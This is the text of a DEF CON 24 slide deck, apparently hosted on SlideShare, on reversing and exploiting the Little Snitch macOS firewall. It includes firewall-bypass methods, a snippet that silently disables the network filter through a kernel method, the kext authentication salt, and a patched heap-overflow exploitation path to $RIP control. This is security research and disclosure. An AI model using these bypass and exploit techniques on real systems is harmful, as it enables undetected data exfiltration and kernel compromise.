Felipe Prado, profile picture
Uploaded byFelipe Prado
49 views

DEF CON 24 - Patrick Wardle - 99 problems little snitch

Little Snitch is a host-based firewall for macOS that intercepts connection attempts and allows the user to approve or deny them. The document discusses understanding, bypassing, and reversing Little Snitch. It provides an overview of Little Snitch's components and architecture, describes several methods for bypassing its network filtering, and examines techniques for interacting with and disabling Little Snitch's kernel extension through the I/O Kit framework.

Technology
Related topics:
Information Security

Embed presentation

Download to read offline
@patrickwardle I got 99 Problems, but 
 Little Snitch ain’t one!
WHOIS “leverages the best combination of humans and technology to discover security vulnerabilities in our customers’ web apps, mobile apps, IoT devices and infrastructure endpoints” @patrickwardle security for the 21st century career hobby
making little snitch our b!tch OUTLINE understanding bypassing reversing owning
UNDERSTANDING LITTLE SNITCH …a brief overview
the de-facto host firewall for macOS LITTLE SNITCH "Little Snitch intercepts connection attempts, and lets you decide how to proceed." -www.obdev.atlittle snitch alert in the news (red team vs. palantir)
the puzzle pieces LITTLE SNITCH COMPONENTS ring-0 ring-3 (root session) LittleSnitch.kext Little Snitch Daemon Little Snitch Configuration Little Snitch Agent ›network, process monitoring 'authentication'› ›rules management ›rules management preferences› ›ui alerts ring-3 (user/UI session) ring-0 bug
BYPASSING LITTLE SNITCH undetected data exfil
abusing system rules to talk to iCloud LITTLE SNITCH BYPASS 0X1 iCloud little snitch's iCloud rule o rly!?...yes! un-deletable system rule: "anybody can talk to iCloud"
abusing 'proc-level' trust LITTLE SNITCH BYPASS 0X2 $ python dylibHijackScanner.py 
 GPG Keychain is vulnerable (weak/rpath'd dylib) 'weak dylib': '/Libmacgpg.framework/Versions/B/Libmacgpg' 'LC_RPATH': '/Applications/GPG Keychain.app/Contents/Frameworks' undetected exfil/C&C "Using Process Infection to Bypass Windows Software Firewalls" -Phrack, '04 gpg keychain; allow all dylib hijack 'injection'
stop the network filter LITTLE SNITCH BYPASS 0X3 ring-0 method 0xB disable: 0x0 ring-3 LittleSnitch.kext //connect & authenticate to kext // ->see later slides for details :) //input // ->set to 0x0 to disable uint64_t input = 0x0; //stop network filter IOConnectCallScalarMethod(connectPort, 0xB, &input, 0x1, NULL, NULL); 'invisible' to UI //input // ->disable is 0x0 if( (0xB == method) && (0x0 == scalarInput) ) { //disable filter! } 'stop network filter'
REVERSING LITTLE SNITCH poking on kext's interfaces
/Library/Extensions/LittleSnitch.kext LITTLE SNITCH'S KEXT $ less LittleSnitch.kext/Contents/Info.plist <?xml version="1.0" encoding="UTF-8"?> <plist version="1.0"> <dict> <key>CFBundleExecutable</key> <string>LittleSnitch</string> <key>CFBundleIdentifier</key> <string>at.obdev.nke.LittleSnitch</string> <key>CFBundlePackageType</key> <string>KEXT</string> <key>IOKitPersonalities</key> <dict> <key>ODLSNKE</key> <dict> <key>CFBundleIdentifier</key> <string>at.obdev.nke.LittleSnitch</string> <key>IOClass</key> <string>at_obdev_LSNKE</string> <key>IOMatchCategory</key> <string>at_obdev_LSNKE</string> <key>IOProviderClass</key> <string>IOResources</string> <key>IOResourceMatch</key> <string>IOBSD</string> </dict> </dict> ... kext's Info.plist file i/o kit signing info
XNU's device driver env I/O KIT self-contained, runtime environment implemented in C++ object-oriented› "Mac OS X and iOS Internals"
 "OS X and iOS Kernel Programming" 
 "IOKit Fundamentals" (apple.com) #include <IOKit/IOLib.h> #define super IOService OSDefineMetaClassAndStructors(com_osxkernel_driver_IOKitTest, IOService) bool com_osxkernel_driver_IOKitTest::init(OSDictionary* dict) { bool res = super::init(dict); IOLog("IOKitTest::initn"); return res; } IOService* com_osxkernel_driver_IOKitTest::probe(IOService* provider, SInt32* score) { IOService *res = super::probe(provider, score); IOLog("IOKitTest::proben"); return res; } bool com_osxkernel_driver_IOKitTest::start (IOService *provider) { bool res = super::start(provider); IOLog("IOKitTest::startn"); return res; } ... $ sudo kextload IOKitTest.kext 
 $ grep IOKitTest /var/log/system.log users-Mac kernel[0]: IOKitTest::init users-Mac kernel[0]: IOKitTest::probe users-Mac kernel[0]: IOKitTest::start load kext; output i/o kit resources › › › sample i/o kit driver
'inter-ring' comms I/O KIT serial port driver open(/dev/xxx) read() / write() other i/o kit drivers find driver; then: I/O Kit Framework read/write 'properties' send control requests "The user-space API though which a process communicates with a kernel driver is provided by a framework known as 'IOKit.framework'" 
 -OS X and iOS Kernel Programming today's focus or
invoking driver methods I/O KIT //look up method, invoke super externalMethod(selector, ...) ring-0 //check params, invoke method super::externalMethod(..., dispatch, ...) } selector (method index) ›dispatch = methods[selector] dispatch (method) method_0(); method_1(); method_2(); ring-3
ex; driver interface I/O KIT const IOExternalMethodDispatch com_osxkernel_driver_IOKitTestUserClient::sMethods[kTestUserClientMethodCount] = { //kTestUserClientStartTimer(void); {sStartTimer, 0, 0, 0, 0}, //kTestUserClientDelayForTime(const TimerValue* timerValue); {sDelayForTime, 0, sizeof(TimerValue), 0, 0}, }; IOReturn com_osxkernel_driver_IOKitTestUserClient::externalMethod (uint32_t selector, IOExternalMethodArguments* arguments, IOExternalMethodDispatch* dispatch, OSObject* target, void* reference){ 
 //ensure the requested control selector is within range if(selector >= kTestUserClientMethodCount) return kIOReturnUnsupported; dispatch = (IOExternalMethodDispatch*)&sMethods[selector]; target = this; reference = NULL; return super::externalMethod(selector, arguments, dispatch, target, reference); } struct IOExternalMethodDispatch { IOExternalMethodAction function; uint32_t checkScalarInputCount; uint32_t checkStructureInputSize; uint32_t checkScalarOutputCount; uint32_t checkStructureOutputSize; }; describes methods/args entry point, user-mode requests forward request to super, 
 which routes to method IOExternalMethodDispatch struct i/o kit driver interface
ex; user 'client' I/O KIT mach_port_t masterPort = 0; io_service_t service = 0;
 
 //get master port IOMasterPort(MACH_PORT_NULL, &masterPort); //get matching service service = IOServiceGetMatchingService(masterPort, IOServiceMatching("com_osxkernel_driver_IOKitTest")); io_connect_t driverConnection = 0; //open connection IOServiceOpen(service, mach_task_self(), 0, &driverConnection); find driver open/create connection struct TimerValue { uint64_t time, uint64_t timebase; }; struct TimerValue timerValue = { .time=500, .timebase=0 }; //make request to driver
 IOConnectCallStructMethod(driverConnection, kTestUserClientDelayForTime, timerValue, sizeof(TimerValue), NULL, 0); kern_return_t IOConnectCallStructMethod( mach_port_t connection, uint32_t selector, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt ); send request IOKitLib.h IOConnectCallStructMethod function"OS X and iOS Kernel Programming" 
 (chapter 5) selector
lea rcx, aDjd4e ; "DJD4E=" mov edx, 0AE4C415Dh ;string decoding omitted lea rsi, [rbp+symbol] mov rdi, 0FFFFFFFFFFFFFFFEh call _dlsym mov r10, rax mov cs:qword_10006E3C8, r10 test r10, r10 jz short loc_100025EAE lea rdi, [rbp+var_30] lea rdx, [rbp+var_2B8] lea rcx, [rbp+var_2D8] mov esi, 4 xor r8d, r8d xor r9d, r9d call r10 ; qword_10006E3C8 test eax, eax jnz short loc_100025EB7 lea rcx, aAec246 ; "AEC246" mov edx, 0AE4C415Dh strDecode: movzx esi, byte ptr [rax+rcx] add esi, 0Fh mov rdi, rsi imul rdi, rdx shr rdi, 26h imul edi, 5Eh sub esi, edi add esi, 20h mov [rbp+rax+symbol], sil inc rax cmp rax, 6 jnz short strDecode mov [rbp+var_2A], 0 lea rsi, [rbp+symbol] mov rdi, 0FFFFFFFFFFFFFFFEh call _dlsym mov r8, rax mov cs:qword_10006E068, r8 mov edi, 1Fh mov esi, 0FFFFFFFFh xor edx, edx xor ecx, ecx call r8 ; qword_10006E068 test eax, eax jz short continue gtfo reversers! #not LITTLE SNITCH ANTI-ANALYSIS #define PT_DENY_ATTACH 0x1F //decode 'ptrace' char* symbol = strDecode("AEC246", 0x0AE4C415D); //get address of ptrace() *(void **)(&fpPTRACE) = dlsym(handle, symbol); //invoke ptrace w/ 'PT_DENY_ATTACH' if(0 != fpPTRACE(PT_DENY_ATTACH, -1, 0, 0)) { //debugger detected // ->exit! } #define P_TRACED 0x00000800 //decode 'sysctl' char* symbol = strDecode("DJD4E=", 0x0AE4C415D); //get address of sysctl() *(void **)(&fpSYSCTL) = dlsym(handle, symbol); //invoke sysctl() to get current process info // ->mib: KERN_PROC, KERN_PROC_PID, and pid fpSYSCTL(mib, 4, &info, &size, NULL, 0); //check if process is being traced if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)) { //debugger detected // ->exit! } # ps aux | grep "Little Snitch" root 61 Little Snitch Daemon # lldb -p 61 (lldb) process attach --pid 61 error: attach failed: lost connection ptrace(PT_DENY_ATTACH) sysclt()/P_TRACED attach? nope!
service: 'at_obdev_LSNKE' FIND/CONNECT TO LITTLE SNITCH'S KEXT char -[m097e1b4e m44e2ed6c](void * self, void * _cmd) { ... sub_10003579a(0x7789); } int sub_10003579a(int arg0) { r15 = arg0; rbx = IOMasterPort(0x0, 0x0);
 r14 = IOServiceGetMatchingService(0x0, IOServiceNameMatching("at_obdev_LSNKE")); r15 = IOServiceOpen(r14, *_mach_task_self_, r15, 0x10006ed58); mach_port_t masterPort = 0; io_service_t serviceObject = 0; io_connect_t connectPort = 0; IOMasterPort(MACH_PORT_NULL, &masterPort); serviceObject = IOServiceGetMatchingService(masterPort, IOServiceMatching("at_obdev_LSNKE")); IOServiceOpen(serviceObject, mach_task_self(), 0x7789, &connectPort); ls' daemon hopper decompilation $ ./connect2LS got master port: 0xb03 got matching service (at_obdev_LSNKE): 0xf03 opened service (0x7789): 0x1003 custom 'connection' code connected!
'reachable' kernel methods ENUMERATING AVAILABLE INTERFACES class_externalMethod proc push rbp mov rbp, rsp cmp esi, 16h ja short callSuper mov eax, esi lea rax, [rax+rax*2] lea rcx, IORegistryDescriptorC3::sMethods lea rcx, [rcx+rax*8] ... callSuper: mov rax, cs:IOUserClient_vTable pop rbp jmp qword ptr [rax+860h] IOKitTestUserClient::externalMethod(uint32_t selector, IOExternalMethodArguments* arguments, IOExternalMethodDispatch* dispatch, OSObject* target, void* reference) if(selector <= 16) dispatch = (IOExternalMethodDispatch*)&sMethods[selector]; return super::externalMethod(selector, arguments, dispatch, target, reference); IORegistryDescriptorC3_sMethods IOExternalMethodDispatch <0FFFFFF7FA13ED82Ah, 0, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED832h, 0, 0, 1, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED846h, 0, 0, 0, 83Ch> IOExternalMethodDispatch <0FFFFFF7FA13ED89Ah, 0, 0Ch, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED8D2h, 0, 0, 0, 10h> IOExternalMethodDispatch <0FFFFFF7FA13ED82Ah, 0, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED82Ah, 0, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED8FAh, 0, 20h, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED944h, 0, 10h, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED95Ah, 0, 0, 1, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED97Eh, 0, 0, 1, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED9CEh, 1, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDA84h, 1, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDAC6h, 0, 0, 0, 10h> IOExternalMethodDispatch <0FFFFFF7FA13EDBBAh, 0, 0, 0, 10h> IOExternalMethodDispatch <0FFFFFF7FA13EDBCEh, 0, 0, 0, 80h> IOExternalMethodDispatch <0FFFFFF7FA13EDBFAh, 0, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDC0Eh, 1, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDC22h, 0, 0Ch, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDC36h, 0, 10h, 0, 18h> IOExternalMethodDispatch <0FFFFFF7FA13EDC4Ah, 0, 0, 0, 2Ch> IOExternalMethodDispatch <0FFFFFF7FA13EDC86h, 0, 54h, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDCC2h, 1, 0, 0, 0> class methods ('sMethods') method #7 struct IOExternalMethodDispatch { IOExternalMethodAction function; uint32_t checkScalarInputCount; uint32_t checkStructureInputSize; uint32_t checkScalarOutputCount; uint32_t checkStructureOutputSize; }; IOExternalMethodDispatch struct pseudo code ls' externalMethod() IOUserClient.h
it haz bug! SAY HELLO TO METHOD 0X7 IOExternalMethodDispatch 
 <0FFFFFF7FA13ED8FAh, 0, 20h, 0, 0> 0XFFFFFF7F86FED8FA method_0x7 proc ... mov rax, [rdi] ; this pointer, vTable mov rax, [rax+988h] ; method mov rsi, rdx jmp rax +0x0 __const:FFFFFF7FA13F5A30 vTable ... ... +0x988 __const:FFFFFF7FA13F63B8 dq offset sub_FFFFFF7FA13EABB2 0x63B8 - 0x5A30 = 0x988 sub_FFFFFF7FA13EABB2 proc mov rbx, rsi mov rdi, [rbx+30h] ; user-mode (ls) struct call sub_FFFFFF7FA13E76BC sub_FFFFFF7FA13E76BC proc near call sub_FFFFFF7FA13E76F7 sub_FFFFFF7FA13E76F7 proc near mov rbx, rdi ; user-mode struct mov rdi, [rbx+8] ; size test rdi, rdi jz short leave ; invalid size cmp qword ptr [rbx], 0 jz short leave mov rsi, cs:allocTag call _OSMalloc ; malloc ... mov rdi, [rbx] ; in buffer mov rdx, [rbx+8] ; size mov rsi, rax ; out buffer (just alloc'd) call _copyin struct lsStruct { void* buffer size_t size; ... }; sub_FFFFFF7FA13E76F7(struct lsStruct* ls) { if( (0 == ls->size) || (NULL == ls->buffer) ) goto bail; kBuffer = OSMalloc(ls->size, tag); if(NULL != kBuffer) copyin(ls->buffer, kBuffer, ls->size); method 0x7 'call thru' malloc/copy (pseudo-code) malloc/copy (IDA)
32bit size matters... KERNEL BUG? void* OSMalloc( uint32_t size, ...); libkern/libkern/OSMalloc.h int copyin(..., vm_size_t nbytes ); osfmk/x86_64/copyio.c offset 15 ... 8 7 6 5 4 3 2 1 0 value 1 0 0 0 0 0 0 0 2 64bit 64bit value: 0x100000002 32bit value: 0x100000002 struct lsStruct ls; ls.buffer = <some user addr>; ls.size = 0x100000002; //malloc & copy kBuffer = OSMalloc(0x00000002, tag); if(NULL != kBuffer) copyin(ls->buffer, kBuffer, 0x100000002); vs. kernel heap heap buffer 
 [size: 2 bytes] rest of heap.... heap buffer 
 [size: 2 bytes] rest of heap.... 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 vm_size_t is 64bits!
OWNING LITTLE SNITCH exploitation?
gotta 'authenticate' ISSUE 0X1 IOExternalMethodDispatch <0FFFFFF7FA13ED8FAh, 0, 20h, 0, 0> method_0x7 proc cmp byte ptr [rdi+0E9h], 0 jz short leave ;buggy code IOExternalMethodDispatch <0FFFFFF7FA13ED944h, 0, 10h, 0, 0> method_0x8 proc MD5Update(var_90, r14 + 0xea, 0x10); MD5Update(var_90, 0x8E6A3FA34C4F4B23, 0x10); MD5Final(0x0FC5C35FAA776E256, var_90); do{ rdx = rcx; rcx = *(int8_t *)(rbp + rax + 0xffffffffffffff60); rcx = rcx ^ *(int8_t *)(rbx + rax); rcx = rcx & 0xff | rdx; rax = rax + 0x1; } while(rax != 0x10); if (rcx == 0x0) *(r14 + 0xe9) = 0x1; connect to Little Snitch driver ('at_obdev_LSNKE') invoke method 0x4 returns 0x10 'random' bytes hash this data, with embedded salt (x56xe2x76xa7...) invoke method 0x8 to with hash to authenticate unsigned char gSalt[] = "x56xe2x76xa7xfax35x5cxfc x23x4bx4fx4cxa3x3fx6ax8e"; 0x0? leave :( sets flag :) authenticated; can (now) reach buggy code!
the bug isn't exploitable!? ISSUE 0X2 kBuffer = OSMalloc(0x00000002, tag); copyin(ls->buffer, kBuffer, 0x100000002); heap buffer 
 [size: 2 bytes] rest of heap.... 0x41 0x41 [ untouched ] only two bytes are copied!? _bcopy(const void *, void *, vm_size_t); /* * Copyin/out from user/kernel * rdi:source address * rsi:destination address * rdx:byte count */ Entry(_bcopy) // TODO: // think about 32 bit or 64 bit byte count movl %edx,%ecx shrl $3,%ecx x86_64/locore.s submit bug report to Apple (2013) Entry(_bcopy) xchgq %rdi, %rsi movl %rdx,%rcx shrl $3,%rcx fixed! (OS X 10.11, 2015) $EDX/$ECX byte count (not $RDX/$RCX) 32bit :(
mapped page unmapped page copyin(ls->buffer, kBuffer, ls->size); controlling the heap copy ISSUE 0X3 heap buffer 
 [size: 2 bytes] rest of heap.... 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 panic :( Entry(_bcopy)
 RECOVERY_SECTION RECOVER(_bcopy_fail) rep movsq movl %edx, %ecx andl $7, %ecx RECOVERY_SECTION RECOVER(_bcopy_fail) _bcopy_fail: movl $(EFAULT),%eax ret 'fault toleranance' 0x100FFC 0x101000 struct lsStruct ls; ls.buffer = 0x100FFC ls.size = 0x100000002; heap buffer 
 [size: 2 bytes] rest of heap.... ring-0 ring-3 control exact # of bytes copied into buffer ls struct 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 ? ? ?
vTable hijacking ($RIP) SUCCESS! heap buffer 
 [size: 2 bytes] C++ object [0xffffff8029a27e00] 0x41 0x41 0x4141414141414141 allocation size bytes copied # of bytes copied controls: + + attacker controlled vTable pointer (lldb) x/4xg 0xffffff8029a27e00 0xffffff8029a27e00: 0x4141414141414141 0x4141414141414141 0xffffff8029a27e10: 0x4141414141414141 0x4141414141414141 (lldb) reg read $rax rax = 0x4141414141414141 (lldb) x/i $rip -> 0xffffff8020b99fb3: ff 50 20 callq *0x20(%rax) control of $RIP :)
reliably exploiting a macOS heap overflow WEAPONIZING "Attacking the XNU Kernel in El Capitan" -luca todesco controlling heap layout
 
 bypassing kALSR bypassing smap/smep payloads (!SIP, etc) "Hacking from iOS 8 to iOS 9" 
 -team pangu "Shooting the OS X El Capitan Kernel Like a Sniper" -liang chen/qidan he } get root 'bring' & load buggy kext exploit & disable SIP SIP 'bypass' (buggy) kext still validly signed!
CONCLUSIONS wrapping it up
at least they fixed it... VENDOR RESPONSE : mov rbx, rdi ; user struct mov edi, [rbx+8] ; size call _OSMalloc mov rdi, [rbx] ; in buffer mov edx, [rbx+8] ; size mov rsi, rax ; out buffer call _copyin fixed the bug
 
 downplayed the bug didn't assign a CVE no credit (i'm ok with that) maybe talking about my exploit!? consistent size users won't patch
free security tools & malware samples OBJECTIVE-SEE(.COM) KnockKnock BlockBlock TaskExplorer Ostiarius Hijack Scanner KextViewr RansomWhere?
contact me any time :) QUESTIONS & ANSWERS patrick@synack.com @patrickwardle "Is it crazy how saying sentences backwards creates backwards sentences saying how crazy it is?" -Have_One, reddit.com final thought ;)
mahalo :) CREDITS - FLATICON.COM - THEZOOOM.COM - ICONMONSTR.COM - HTTP://WIRDOU.COM/2012/02/04/IS-THAT-BAD-DOCTOR/ - HTTP://TH07.DEVIANTART.NET/FS70/PRE/F/ 2010/206/4/4/441488BCC359B59BE409CA02F863E843.JPG 
 
 - "IOS KERNEL EXPLOITATION --- IOKIT EDITION ---" -STEFANO ESSER - "REVISITING MAC OS X KERNEL ROOTKITS!" -PEDRO VILAÇA - "FIND YOUR OWN IOS KERNEL BUG" -XU HAO/XIABO CHEN - "ATTACKING THE XNU KERNEL IN EL CAPITAN" -LUCA TODESCO - "HACKING FROM IOS 8 TO IOS 9" -TEAM PANGU - "SHOOTING THE OS X EL CAPITAN KERNEL LIKE A SNIPER" -LIANG CHEN/QIDAN HE - "OPTIMIZED FUZZING IOKIT IN IOS" -LEI LONG - "MAC OS X AND IOS INTERNALS" -JONATHAN LEVIN - "OS X AND IOS KERNEL PROGRAMMING" -OLE HALVORSEN/DOUGLAS CLARKE images resources

More Related Content

PDF
Troubleshooting tips and tricks for Oracle Database Oct 2020
bySandesh Rao
 
PPT
Bsides
bym j
 
PDF
Rootkit on Linux X86 v2.6
byfisher.w.y
 
PPTX
Cisco IOS shellcode: All-in-one
byDefconRussia
 
PDF
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
bySynack
 
PDF
Moony li pacsec-1.8
byPacSecJP
 
PDF
Arduino
bySHAWN GANGASINGH
 
PDF
Orasta500.c
byalbertinous
 
Troubleshooting tips and tricks for Oracle Database Oct 2020
bySandesh Rao
 
Bsides
bym j
 
Rootkit on Linux X86 v2.6
byfisher.w.y
 
Cisco IOS shellcode: All-in-one
byDefconRussia
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
bySynack
 
Moony li pacsec-1.8
byPacSecJP
 
Arduino
bySHAWN GANGASINGH
 
Orasta500.c
byalbertinous
 

What's hot

PDF
Ieee 1149.1-2013-tutorial-ijtag
byVenkateshwar Motamarri
 
PPT
Troubleshooting Linux Kernel Modules And Device Drivers
bySatpal Parmar
 
PDF
ZeroNights: Automating iOS blackbox security scanning
byMikhail Sosonkin
 
PDF
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
bySimen Li
 
PDF
Applications secure by default
bySecuRing
 
PDF
Linux kernel debugging(PDF format)
byyang firo
 
PDF
Gatekeeper Exposed
bySynack
 
PDF
Crash_Report_Mechanism_In_Tizen
byLex Yu
 
PDF
Vhdl practical exam guide
byEslam Mohammed
 
PDF
Sniffing Mach Messages
byMikhail Sosonkin
 
PDF
Automatic Identification of Bug-Introducing Changes
byThomas Zimmermann
 
PDF
NYU hacknight, april 6, 2016
byMikhail Sosonkin
 
PDF
Synack at AppSec California with Patrick Wardle
bySynack
 
PDF
iOS Automation Primitives
bySynack
 
PDF
망고100 보드로 놀아보자 15
by종인 전
 
PDF
OS X Malware: Let's Play Doctor
bySynack
 
PPT
W8_2: Inside the UoS Educational Processor
byDaniel Roggen
 
PDF
RSA OSX Malware
bySynack
 
PDF
Virus Bulletin 2015: Exposing Gatekeeper
bySynack
 
PDF
Keyless Door Entry via Bluetooth Technology
byMatthew Weppler
 
Ieee 1149.1-2013-tutorial-ijtag
byVenkateshwar Motamarri
 
Troubleshooting Linux Kernel Modules And Device Drivers
bySatpal Parmar
 
ZeroNights: Automating iOS blackbox security scanning
byMikhail Sosonkin
 
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
bySimen Li
 
Applications secure by default
bySecuRing
 
Linux kernel debugging(PDF format)
byyang firo
 
Gatekeeper Exposed
bySynack
 
Crash_Report_Mechanism_In_Tizen
byLex Yu
 
Vhdl practical exam guide
byEslam Mohammed
 
Sniffing Mach Messages
byMikhail Sosonkin
 
Automatic Identification of Bug-Introducing Changes
byThomas Zimmermann
 
NYU hacknight, april 6, 2016
byMikhail Sosonkin
 
Synack at AppSec California with Patrick Wardle
bySynack
 
iOS Automation Primitives
bySynack
 
망고100 보드로 놀아보자 15
by종인 전
 
OS X Malware: Let's Play Doctor
bySynack
 
W8_2: Inside the UoS Educational Processor
byDaniel Roggen
 
RSA OSX Malware
bySynack
 
Virus Bulletin 2015: Exposing Gatekeeper
bySynack
 
Keyless Door Entry via Bluetooth Technology
byMatthew Weppler
 

Similar to DEF CON 24 - Patrick Wardle - 99 problems little snitch

PDF
Qemu JIT Code Generator and System Emulation
byNational Cheng Kung University
 
PDF
Fire & Ice: Making and Breaking macOS Firewalls
byPriyanka Aash
 
PDF
Find your own iOS kernel bug
byGustavo Martinez
 
PDF
Return Oriented Programming - ROP
byMihir Shah
 
PDF
Let's write a Debugger!
byLevente Kurusa
 
PPT
Reverse engineering20151112
byBordeaux I
 
PDF
The Python bites your apple
byQidan He
 
PPTX
Steelcon 2014 - Process Injection with Python
byinfodox
 
PPT
E-Commerce Security - Application attacks - Server Attacks
byphanleson
 
PDF
[DSC] Introduction to Binary Exploitation
byFlorian Müller
 
PDF
[Ruxcon 2011] Post Memory Corruption Memory Analysis
byMoabi.com
 
ODP
Code Red Security
byAmr Ali
 
PDF
NYU Hacknight: iOS and OSX ABI
byMikhail Sosonkin
 
PDF
TDOH x 台科 pwn課程
byWeber Tsai
 
PDF
Buffer overflow tutorial
byhughpearse
 
PPTX
Ice Age melting down: Intel features considered usefull!
byPeter Hlavaty
 
PPTX
Operating system enhancements to prevent misuse of systems
byDayal Dilli
 
PDF
Eusecwest
byzynamics GmbH
 
PDF
Code Signing with CPK
byZhi Guan
 
PDF
Lect02
byVin Voro
 
Qemu JIT Code Generator and System Emulation
byNational Cheng Kung University
 
Fire & Ice: Making and Breaking macOS Firewalls
byPriyanka Aash
 
Find your own iOS kernel bug
byGustavo Martinez
 
Return Oriented Programming - ROP
byMihir Shah
 
Let's write a Debugger!
byLevente Kurusa
 
Reverse engineering20151112
byBordeaux I
 
The Python bites your apple
byQidan He
 
Steelcon 2014 - Process Injection with Python
byinfodox
 
E-Commerce Security - Application attacks - Server Attacks
byphanleson
 
[DSC] Introduction to Binary Exploitation
byFlorian Müller
 
[Ruxcon 2011] Post Memory Corruption Memory Analysis
byMoabi.com
 
Code Red Security
byAmr Ali
 
NYU Hacknight: iOS and OSX ABI
byMikhail Sosonkin
 
TDOH x 台科 pwn課程
byWeber Tsai
 
Buffer overflow tutorial
byhughpearse
 
Ice Age melting down: Intel features considered usefull!
byPeter Hlavaty
 
Operating system enhancements to prevent misuse of systems
byDayal Dilli
 
Eusecwest
byzynamics GmbH
 
Code Signing with CPK
byZhi Guan
 
Lect02
byVin Voro
 

More from Felipe Prado

PDF
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
byFelipe Prado
 
PDF
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
byFelipe Prado
 
PDF
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
byFelipe Prado
 
PDF
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
byFelipe Prado
 
PDF
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
byFelipe Prado
 
PDF
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
byFelipe Prado
 
PDF
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
byFelipe Prado
 
PDF
DEF CON 24 - Clarence Chio - machine duping 101
byFelipe Prado
 
PDF
DEF CON 24 - Rich Mogull - pragmatic cloud security
byFelipe Prado
 
PDF
DEF CON 24 - Antonio Joseph - fuzzing android devices
byFelipe Prado
 
PDF
DEF CON 24 - Gorenc Sands - hacker machine interface
byFelipe Prado
 
PDF
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
byFelipe Prado
 
PDF
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
byFelipe Prado
 
PDF
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
byFelipe Prado
 
PDF
DEF CON 24 - Ladar Levison - compelled decryption
byFelipe Prado
 
PDF
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
byFelipe Prado
 
PDF
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
byFelipe Prado
 
PDF
DEF CON 24 - Chris Rock - how to overthrow a government
byFelipe Prado
 
PDF
DEF CON 24 - Grant Bugher - Bypassing captive portals
byFelipe Prado
 
PDF
DEF CON 24 - Tamas Szakaly - help i got ants
byFelipe Prado
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
byFelipe Prado
 
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
byFelipe Prado
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
byFelipe Prado
 
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
byFelipe Prado
 
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
byFelipe Prado
 
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
byFelipe Prado
 
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
byFelipe Prado
 
DEF CON 24 - Clarence Chio - machine duping 101
byFelipe Prado
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
byFelipe Prado
 
DEF CON 24 - Antonio Joseph - fuzzing android devices
byFelipe Prado
 
DEF CON 24 - Gorenc Sands - hacker machine interface
byFelipe Prado
 
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
byFelipe Prado
 
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
byFelipe Prado
 
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
byFelipe Prado
 
DEF CON 24 - Ladar Levison - compelled decryption
byFelipe Prado
 
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
byFelipe Prado
 
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
byFelipe Prado
 
DEF CON 24 - Chris Rock - how to overthrow a government
byFelipe Prado
 
DEF CON 24 - Grant Bugher - Bypassing captive portals
byFelipe Prado
 
DEF CON 24 - Tamas Szakaly - help i got ants
byFelipe Prado
 

Recently uploaded

PPTX
DYNAMICALLY.pptx good for the teachers or students to do seminars and for tea...
bympoorvika031
 
PDF
Data Virtualization in Action: Scaling APIs and Apps with FME
bySafe Software
 
DOCX
iRobot Post‑Mortem and Alternative Paths - Discussion Document for Boards and...
byDave Litwiller
 
PPTX
Coded Agents – with UiPath SDK + LangGraph [Virtual Hands-on Workshop]
byUiPathCommunity
 
PDF
GPUS and How to Program Them by Manya Bansal
byScyllaDB
 
PDF
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
PDF
Internet_of_Things_IoT_for_Next_Generation_Smart_Systems_Utilizing.pdf
byRoshanSyed12
 
PDF
Day 3 - Data and Application Security - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PDF
Making Sense of Raster: From Bit Depth to Better Workflows
bySafe Software
 
PDF
December Patch Tuesday
byIvanti
 
PPTX
